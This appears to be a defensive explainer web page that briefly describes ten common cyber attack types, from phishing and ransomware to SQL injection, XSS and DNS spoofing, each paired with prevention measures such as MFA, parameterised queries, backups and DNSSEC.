Kernel of Truth

Common Attack Types

💥 Common Cyber Attack Types Explained

Cyber attackers use a wide range of techniques to infiltrate, disrupt, or exploit systems. Whether targeting individuals, companies, or governments, these attack types represent the most frequently seen threats in the modern threat landscape.

Understanding them is key to defending against them.

🪝 1. Phishing Attacks

What It Is:
Social engineering attack where attackers trick users into clicking malicious links or revealing sensitive information.

Variants:

  • Email phishing
  • Spear phishing (targeted)
  • SMS phishing (smishing)
  • Voice phishing (vishing)

Prevention:

  • Email filtering
  • Security awareness training
  • Multi-factor authentication (MFA)

🧬 2. Malware

What It Is:
Malicious software designed to disrupt, damage, or gain unauthorised access to a system.

Types of Malware:

  • Viruses
  • Worms
  • Trojans
  • Spyware
  • Ransomware
  • Rootkits

Prevention:

  • Keep systems patched
  • Use endpoint protection (EDR/AV)
  • Monitor file behaviour and registry changes

🔒 3. Ransomware

What It Is:
A type of malware that encrypts files and demands a ransom to unlock them.

Delivery Methods:

  • Phishing emails
  • Malicious downloads
  • Exploit kits

Prevention:

  • Offline and tested backups
  • Block known C2 IPs and domains
  • Use network segmentation

🎭 4. Man-in-the-Middle (MitM)

What It Is:
An attacker secretly intercepts or alters communication between two parties.

Common Forms:

  • Session hijacking
  • HTTPS stripping
  • Rogue Wi-Fi access points

Prevention:

  • Enforce TLS (HTTPS)
  • Use VPNs on untrusted networks
  • Implement certificate pinning

🧩 5. SQL Injection (SQLi)

What It Is:
Malicious SQL code is inserted into input fields to access or manipulate databases.

Impact:

  • Data exfiltration
  • User impersonation
  • Full database control

Prevention:

  • Use parameterised queries
  • Implement input validation and output encoding
  • Use Web Application Firewalls (WAFs)

💣 6. Denial of Service (DoS) / Distributed DoS (DDoS)

What It Is:
Flooding a system or service with traffic until it’s unavailable.

Types:

  • Volumetric attacks (UDP floods, ICMP)
  • Application-layer attacks (HTTP floods)

Prevention:

  • Rate limiting
  • CDN/DDoS protection (e.g. Cloudflare, Akamai)
  • Network firewalls and load balancers

🧠 7. Brute Force and Credential Stuffing

What It Is:
Automated attempts to guess passwords or use leaked credentials from other breaches.

Tools Used:

  • Hydra, Burp Suite, SentryMBA

Prevention:

  • Use strong password policies
  • Lock accounts after failed attempts
  • Deploy CAPTCHA and MFA

🕵️‍♂️ 8. Insider Threats

What It Is:
Malicious or negligent actions by employees or contractors with access to systems.

Types:

  • Data theft
  • System sabotage
  • Unintentional leaks (e.g. via misconfigured sharing)

Prevention:

  • Role-based access controls (RBAC)
  • Data loss prevention (DLP)
  • Insider threat detection programs

🧱 9. Cross-Site Scripting (XSS)

What It Is:
Malicious scripts are injected into web pages to execute in users’ browsers.

Impact:

  • Session hijacking
  • Credential theft
  • Defacing websites

Prevention:

  • Sanitize and escape user input
  • Use Content Security Policy (CSP)
  • Disable inline JavaScript where possible

🌍 10. DNS Spoofing / Poisoning

What It Is:
Manipulating DNS responses to redirect traffic to malicious sites.

Impact:

  • Phishing
  • Malware delivery
  • Surveillance

Prevention:

  • Use DNSSEC
  • Enforce encrypted DNS (DoH or DoT)
  • Monitor DNS logs for anomalies

🧠 Summary

Cyber threats are diverse, adaptive, and constantly evolving. By understanding these common attack types, defenders can better detect, prevent, and respond to incidents before damage is done.

🛡️ Cybersecurity is less about perfection and more about layered defence and constant vigilance.